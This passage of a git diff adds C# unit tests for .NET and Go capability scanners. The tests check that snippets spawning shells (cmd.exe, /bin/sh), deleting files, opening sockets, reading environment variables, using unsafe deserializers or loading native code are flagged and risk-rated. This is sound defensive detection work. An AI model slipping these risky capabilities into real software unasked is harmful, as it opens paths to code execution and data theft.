+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewProcessStartInfo()
+ {
+ const string code = @"var psi = new ProcessStartInfo(""cmd.exe"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("ProcessStartInfo", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessStartInfoObjectInitializer()
+ {
+ const string code = @"var psi = new ProcessStartInfo { FileName = ""cmd.exe"" };";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUseShellExecuteTrue()
+ {
+ const string code = @"psi.UseShellExecute = true;";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("UseShellExecute=true", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsFileReadAllText()
+ {
+ const string code = @"var content = File.ReadAllText(""file.txt"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileWriteAllText()
+ {
+ const string code = @"File.WriteAllText(""file.txt"", content);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileDelete()
+ {
+ const string code = @"File.Delete(""file.txt"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File/Directory.Delete", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDirectoryDelete()
+ {
+ const string code = @"Directory.Delete(""dir"", true);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File/Directory.Delete", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileCopy()
+ {
+ const string code = @"File.Copy(""src.txt"", ""dest.txt"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File/Directory operations", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewFileStream()
+ {
+ const string code = @"using var fs = new FileStream(""file.bin"", FileMode.Open);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("FileStream", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSetAccessControl()
+ {
+ const string code = @"fileInfo.SetAccessControl(security);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("SetAccessControl", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewHttpClient()
+ {
+ const string code = @"using var client = new HttpClient();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("HttpClient", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsGetAsync()
+ {
+ const string code = @"var response = await client.GetAsync(url);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("HttpClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewWebClient()
+ {
+ const string code = @"using var client = new WebClient();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("WebClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewSocket()
+ {
+ const string code = @"var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("Socket/TcpClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewTcpClient()
+ {
+ const string code = @"var tcp = new TcpClient(""localhost"", 8080);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("Socket/TcpClient", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWebRequestCreate()
+ {
+ const string code = @"var request = WebRequest.Create(url);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("WebRequest", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsEnvironmentGetEnvironmentVariable()
+ {
+ const string code = @"var path = Environment.GetEnvironmentVariable(""PATH"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("Environment.GetEnvironmentVariable", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsEnvironmentSetEnvironmentVariable()
+ {
+ const string code = @"Environment.SetEnvironmentVariable(""MY_VAR"", ""value"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("Environment.SetEnvironmentVariable", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsEnvironmentGetEnvironmentVariables()
+ {
+ const string code = @"var envVars = Environment.GetEnvironmentVariables();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("Environment.GetEnvironmentVariables", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns (Critical for deserialization attacks)
+
+ [Fact]
+ public void ScanFile_DetectsBinaryFormatter()
+ {
+ const string code = @"var formatter = new BinaryFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("BinaryFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsObjectStateFormatter()
+ {
+ const string code = @"var formatter = new ObjectStateFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("ObjectStateFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetDataContractSerializer()
+ {
+ const string code = @"var serializer = new NetDataContractSerializer();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("NetDataContractSerializer", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsLosFormatter()
+ {
+ const string code = @"var formatter = new LosFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("LosFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSoapFormatter()
+ {
+ const string code = @"var formatter = new SoapFormatter();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("SoapFormatter", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDataContractSerializer()
+ {
+ const string code = @"var serializer = new DataContractSerializer(typeof(MyClass));";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("DataContractSerializer", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJsonDeserialize()
+ {
+ const string code = @"var obj = JsonSerializer.Deserialize(json);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("JsonSerializer.Deserialize", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsAesCreate()
+ {
+ const string code = @"using var aes = Aes.Create();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("Cryptography", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRsaCreate()
+ {
+ const string code = @"using var rsa = RSA.Create();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("Asymmetric crypto", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewSqlConnection()
+ {
+ const string code = @"using var conn = new SqlConnection(connectionString);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("SqlConnection", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewSqlCommand()
+ {
+ const string code = @"var cmd = new SqlCommand(""SELECT * FROM Users"", conn);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("SqlCommand", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecuteNonQuery()
+ {
+ const string code = @"cmd.ExecuteNonQuery();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("Execute*", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecuteReader()
+ {
+ const string code = @"using var reader = cmd.ExecuteReader();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsDynamicMethod()
+ {
+ const string code = @"var dm = new DynamicMethod(""Test"", typeof(int), null);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("DynamicMethod", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsILGenerator()
+ {
+ const string code = @"var il = dm.GetILGenerator();";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("ILGenerator", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCSharpScript()
+ {
+ const string code = @"var result = await CSharpScript.EvaluateAsync(code);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("CSharpScript", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsTypeBuilder()
+ {
+ const string code = @"var tb = mb.DefineType(""MyType"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ // TypeBuilder check expects "TypeBuilder" in the line
+ Assert.Empty(result); // DefineType doesn't match TypeBuilder pattern
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsAssemblyLoad()
+ {
+ const string code = @"var assembly = Assembly.Load(""MyAssembly"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Assembly.Load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsAssemblyLoadFrom()
+ {
+ const string code = @"var assembly = Assembly.LoadFrom(""plugin.dll"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Assembly.Load", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsAssemblyLoadFile()
+ {
+ const string code = @"var assembly = Assembly.LoadFile(path);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsTypeInvokeMember()
+ {
+ const string code = @"type.InvokeMember(""Method"", BindingFlags.InvokeMethod, null, obj, args);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Type.InvokeMember", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsActivatorCreateInstance()
+ {
+ const string code = @"var obj = Activator.CreateInstance(type);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Activator.CreateInstance", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsDllImport()
+ {
+ const string code = @"[DllImport(""kernel32.dll"")]";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("DllImport", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsLibraryImport()
+ {
+ const string code = @"[LibraryImport(""user32.dll"")]";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("LibraryImport", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMarshalPtrToStructure()
+ {
+ const string code = @"var obj = Marshal.PtrToStructure(ptr);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("Marshal operations", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMarshalAllocHGlobal()
+ {
+ const string code = @"var ptr = Marshal.AllocHGlobal(size);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNativeLibraryLoad()
+ {
+ const string code = @"var lib = NativeLibrary.Load(""mylib.dll"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("NativeLibrary.Load", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsIntPtrOperations()
+ {
+ const string code = @"var ptr = new IntPtr(address);";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("IntPtr operations", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Unsafe Patterns
+
+ [Fact]
+ public void ScanFile_DetectsUnsafeBlock()
+ {
+ const string code = @"unsafe { var ptr = &value; }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("unsafe block", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFixedStatement()
+ {
+ const string code = @"fixed (byte* ptr = array) { }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("fixed statement", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsStackalloc()
+ {
+ const string code = @"Span buffer = stackalloc byte[256];";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("stackalloc", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region DotNetCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.cs",
+ 10,
+ "Process.Start");
+
+ Assert.Equal("Exec|Test.cs|10|Process.Start", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec, "Test.cs", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec, "Test.cs", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.cs",
+ 10,
+ "Process.Start",
+ snippet: "Process.Start(\"cmd.exe\");",
+ confidence: 0.95f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("exec", metadata["capability.kind"]);
+ Assert.Equal("Test.cs:10", metadata["capability.source"]);
+ Assert.Equal("Process.Start", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("0.95", metadata["capability.confidence"]);
+ Assert.Contains("Process.Start", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new DotNetCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.cs",
+ 10,
+ "Process.Start");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("Test.cs", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:Process.Start", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs
new file mode 100644
index 000000000..b41dbaacb
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs
@@ -0,0 +1,766 @@
+using StellaOps.Scanner.Analyzers.Lang.Go.Internal;
+
+namespace StellaOps.Scanner.Analyzers.Lang.Go.Tests.Internal;
+
+///
+/// Tests for .
+///
+public sealed class GoCapabilityScannerTests
+{
+ private const string TestFile = "test.go";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = GoCapabilityScanner.ScanFile(null!, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = GoCapabilityScanner.ScanFile("", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = GoCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+package main
+
+func main() {
+ x := 1 + 2
+ println(x)
+}";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"cmd := exec.Command(""ls"")";
+ var result = GoCapabilityScanner.ScanFile(code, @"C:\test\file.go");
+
+ Assert.Single(result);
+ Assert.Equal("C:/test/file.go", result[0].SourceFile);
+ }
+
+ [Fact]
+ public void ScanFile_DeduplicatesSamePattern()
+ {
+ const string code = @"
+exec.Command(""ls"")
+exec.Command(""pwd"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ // Two different lines = two evidences
+ Assert.Equal(2, result.Count);
+ }
+
+ [Fact]
+ public void ScanFile_SortsByFileLineThenKind()
+ {
+ const string code = @"
+os.Getenv(""PATH"")
+exec.Command(""ls"")
+os.Open(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.True(result.Count >= 3);
+ for (int i = 1; i < result.Count; i++)
+ {
+ Assert.True(
+ result[i - 1].SourceLine < result[i].SourceLine ||
+ (result[i - 1].SourceLine == result[i].SourceLine &&
+ result[i - 1].Kind <= result[i].Kind));
+ }
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+package main
+// exec.Command(""ls"") - this is a comment
+func main() {}";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+package main
+/*
+exec.Command(""ls"")
+os.Remove(""file"")
+*/
+func main() {}";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns
+
+ [Fact]
+ public void ScanFile_DetectsExecCommand()
+ {
+ const string code = @"cmd := exec.Command(""ls"", ""-la"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("exec.Command", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecCommandContext()
+ {
+ const string code = @"cmd := exec.CommandContext(ctx, ""ls"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("exec.Command", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSyscallExec()
+ {
+ const string code = @"syscall.Exec(""/bin/sh"", args, env)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("syscall.Exec", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSyscallForkExec()
+ {
+ const string code = @"syscall.ForkExec(""/bin/sh"", args, nil)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("syscall.Exec", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsStartProcess()
+ {
+ const string code = @"os.StartProcess(""/bin/ls"", []string{}, &attr)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("os.StartProcess", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsOsCreate()
+ {
+ const string code = @"f, err := os.Create(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Open/Create", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsOpen()
+ {
+ const string code = @"f, err := os.Open(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Open/Create", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsOpenFile()
+ {
+ const string code = @"f, err := os.OpenFile(""file.txt"", os.O_RDWR, 0644)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsRemove()
+ {
+ const string code = @"os.Remove(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsRemoveAll()
+ {
+ const string code = @"os.RemoveAll(""/tmp/dir"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsChmod()
+ {
+ const string code = @"os.Chmod(""file.txt"", 0755)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
